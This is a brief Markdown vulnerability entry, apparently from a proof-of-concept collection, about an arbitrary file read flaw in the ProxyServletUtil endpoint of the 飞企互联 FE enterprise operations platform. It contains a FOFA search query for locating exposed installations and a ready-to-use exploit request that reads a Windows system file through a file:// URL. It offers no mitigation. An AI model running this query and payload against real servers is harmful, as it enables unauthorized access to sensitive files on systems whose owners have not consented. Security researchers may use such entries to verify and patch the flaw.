16 lines
390 B
Markdown
16 lines
390 B
Markdown
|
## 飞企互联-FE企业运营管理平台ProxyServletUti存在任意文件读取漏洞
|
|||
|
|
|
|||
|
|
飞企互联FE业务协作平台中的ProxyServletUti接口存在任意文件读取漏洞。攻击者可以通过构造特定请求,读取服务器上的敏感文件。
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
## fofa
|
|||
|
|
```
|
|||
|
|
app="飞企互联-FE企业运营管理平台"
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
## poc
|
|||
|
|
```
|
|||
|
|
/ProxyServletUtil?url=file:///c:/Windows/win.ini
|
|||
|
|
```
|